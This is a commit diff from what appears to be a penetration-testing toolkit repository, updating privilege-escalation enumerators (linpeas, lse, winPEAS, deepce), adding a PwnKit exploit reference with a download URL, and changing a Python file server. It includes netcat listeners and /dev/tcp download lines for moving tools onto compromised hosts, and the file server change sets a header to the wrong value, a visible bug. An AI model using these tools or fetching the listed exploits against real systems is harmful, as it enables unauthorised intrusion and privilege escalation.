Browse Source

Project Update

Roman Hergenreder 2 years ago
parent
commit
1f55516c59
12 changed files with 105 additions and 197 deletions
  1. BIN
      chisel64
  2. 1 1
      deepce.sh
  3. 9 4
      fileserver.py
  4. 74 188
      linpeas.sh
  5. 11 0
      linux-exploit-suggester.sh
  6. 8 2
      lse.sh
  7. 1 1
      util.py
  8. BIN
      win/chisel.exe
  9. BIN
      win/chisel64.exe
  10. 1 1
      win/winPEAS.bat
  11. BIN
      win/winPEAS.exe
  12. BIN
      win/winPEASx64.exe

BIN
chisel64


+ 1 - 1
deepce.sh

@@ -347,7 +347,7 @@ containerCheck() {
   # Are we inside kubenetes?
   if grep "/kubepod" /proc/1/cgroup -qa; then
     inContainer="1"
-    containerType="kubentes"
+    containerType="kubernetes"
   fi
 
   # Are we inside LXC?

+ 9 - 4
fileserver.py

@@ -86,6 +86,8 @@ class FileServerRequestHandler(BaseHTTPRequestHandler):
         if path in self.server.dumpRequests:
             headers["Access-Control-Allow-Origin"] = "*"
 
+        headers["Content-Length"] = len(data)
+
         if len(headers) == 0:
             self.send_response(status_code)
         else:
@@ -149,11 +151,14 @@ class HttpFileServer(HTTPServer):
         if isinstance(data, str):
             data = data.encode("UTF-8")
 
-        # return 200 - OK and data
+        headers = { 
+            "Access-Control-Allow-Origin": "*",
+        }
         if mimeType:
-            self.addRoute(name, lambda req: (200, data, { "Content-Type": mimeType }))
-        else:
-            self.addRoute(name, lambda req: (200, data))
+            headers["Content-Type"] = headers
+
+        # return 200 - OK and data
+        self.addRoute(name, lambda req: (200, data, headers))
 
     def dumpRequest(self, name):
         self.dumpRequests.append(self.cleanPath(name))

File diff suppressed because it is too large
+ 74 - 188
linpeas.sh


+ 11 - 0
linux-exploit-suggester.sh

@@ -1490,6 +1490,17 @@ exploit-db: https://www.exploit-db.com/exploits/41154
 EOF
 )
 
+EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
+Name: ${txtgrn}[CVE-2021-4034]${txtrst} PwnKit
+Reqs: pkg=polkit|policykit-1,ver<=0.105-31
+Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,debian=7|8|9|10|11,fedora,manjaro
+Rank: 1
+analysis-url: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
+src-url: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
+author: berdav
+EOF
+)
+
 ###########################################################
 ## security related HW/kernel features
 ###########################################################

+ 8 - 2
lse.sh

@@ -5,7 +5,7 @@
 # Author: Diego Blanco <diego.blanco@treitos.com>
 # GitHub: https://github.com/diego-treitos/linux-smart-enumeration
 #
-lse_version="3.7"
+lse_version="3.9"
 
 #( Colors
 #
@@ -502,7 +502,8 @@ lse_serve() {
     cecho "${green}   * ${white}wget ${reset}           '$ip:$port' -O lse.sh; chmod 755 lse.sh\n"
     cecho "${green}   * ${white}exec 3<>/dev/tcp/${reset}$ip/$port;printf '\\\\n'>&3;cat<&3>lse.sh;exec 3<&-;chmod 755 lse.sh\n"
   done
-  nc -l -q0 -p "$port" < "$0" >/dev/null
+  # try nc with '-N' (openbsd), then ncat and then use '-q0' (traditional)
+  nc -l -N -p "$port" < "$0" >/dev/null 2>/dev/null || nc -l --send-only -p "$port" < "$0" >/dev/null 2>/dev/null || nc -l -q0 -p "$port" < "$0" >/dev/null
 }
 lse_header() {
   local id="$1"
@@ -1262,6 +1263,11 @@ lse_run_tests_software() {
     "Can we write to screen session sockets from other users?" \
     'find /run/screen -type s -writable -regex "/run/screen/S-.+/.+" ! -user $lse_user -exec ls -l {} +'
 
+  #check connection to mongoDB
+  lse_test "sof170" "1" \
+    "Can we access MongoDB databases without credentials?" \
+    'echo "show dbs" | mongo --quiet | grep -E "(admin|config|local)"'
+
   #sudo version - check to see if there are any known vulnerabilities with this
   lse_test "sof500" "2" \
     "Sudo version" \

+ 1 - 1
util.py

@@ -193,7 +193,7 @@ if __name__ == "__main__":
             output = set_exif_data(payload, _in, _out, tag)
             sys.stdout.buffer.write(output)
             sys.stdout.flush()
-    elif command == "help":
+    else:
         print("Usage: %s [command]" % bin)
         print("Available commands:")
         print("   help, getAddress, pad, exifImage")

BIN
win/chisel.exe


BIN
win/chisel64.exe


+ 1 - 1
win/winPEAS.bat

@@ -237,7 +237,7 @@ CALL :T_Progress 2
 :RemodeDeskCredMgr
 CALL :ColorLine " %E%33m[+]%E%97m Remote Desktop Credentials Manager"
 ECHO.   [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#remote-desktop-credential-manager
-IF exist "%AppLocal%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings" ECHO.Found: RDCMan.settings in %AppLocal%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings, check for credentials in .rdg files
+IF exist "%LOCALAPPDATA%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings" ECHO.Found: RDCMan.settings in %AppLocal%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings, check for credentials in .rdg files
 ECHO.
 CALL :T_Progress 1
 

BIN
win/winPEAS.exe


BIN
win/winPEASx64.exe


Some files were not shown because too many files changed in this diff